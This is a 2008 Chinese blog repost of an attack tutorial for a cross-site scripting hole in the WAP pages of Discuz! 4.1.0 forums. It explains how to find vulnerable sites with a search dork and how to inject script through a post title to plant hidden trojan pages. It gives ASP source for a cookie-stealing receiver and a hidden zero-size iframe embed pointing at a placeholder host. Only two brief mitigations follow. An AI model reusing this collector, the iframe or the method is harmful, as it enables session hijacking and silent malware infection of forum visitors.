数据加载中……


 

 登   陆

我的分类(专题)
数据加载中……

链接

Blog信息
数据加载中……

 



Discuz! 4.1.0 wap 跨站漏洞
樱木花盗 发表于 2008-1-6 14:07:56

老文章了。。。以前貌似没转来过。。补上。

漏洞分析:Discuz!4.1.0对开放WAP页面的过滤不严是造成这个漏洞的原因。漏洞涉及到了Dz4.1.0所有开放了WAP功能的论坛。利用者可以通过工具提交一段恶意代码来实现跨站攻击。

利用工具:

1. WAP浏览器

2. WAP编码转换器(可选)

实战:

首先,我们在google中搜索关键字 intextowered by Discuz! 4.1.0 会找到很多用了该程序的国内论坛。随便找到一个网站,我们进去先随便注册一个帐号。

打开我们的WAP浏览工具WapDisplayer,在地址栏处输入这个网址,打开wap页,如图一所示:

我们点击“登陆”在下面输入我们刚刚注册的用户名和密码,如图二所示:

如果出现以下出错提示,则说明该论坛未开启WAP功能,我们便无法进行下一步的入侵了。只能再找其他的网站。

如果正常访问,会出现主题列表,我们可以随便选择一个有发贴权限的板块,点击下面的“发表话题”,如图所示。在出来的“标题”中填入我们的跨站代码,在“内容”处随便输入。之后点击“提交”。如果出现“提交成功”;那么恭喜你!基本可以说已经搞定了!

我们回到刚才我们跨站过的页面看一下。这里我用了两个代码,一个是把我们网站的首页挂在了论坛上,一个是插入“Hello!

的时候,就会看到如图所示的页面。对于第一个,如果把它改成了隐藏的网页木马地址。对方就会在浏览论坛时不知不觉中中了我们的木马!

以上两段代码的构造非常简单,大家都明白,我这里就不写了。

解决办法:1.论坛换为更为稳定的4.0.0版本。毕竟现在的这个版本还在测试阶段。

2.停止掉论坛的WAP功能。

中文WAP浏览器WapDisplayer

http://download.enet.com.cn/html/010022005092702.html

附:获取cookie的asp源代码:

<%
testfile=Server.MapPath("cookies.txt")
msg=Request("msg")
set fs=server.CreateObject("scripting.filesystemobject")
set thisfile=fs.OpenTextFile(testfile,8,True,0)
thisfile.WriteLine(""&msg& "")
thisfile.close
set fs = nothing
%>

嵌入代码:
<iframe height=0 width=0 src="http://xxx"></iframe>

 


阅读全文 | 回复(0) | 引用通告 | 编辑
 


发表评论:

    昵称:
    密码: (游客无须输入密码)
    主页:
    标题:
    数据加载中……


Powered by Oblog.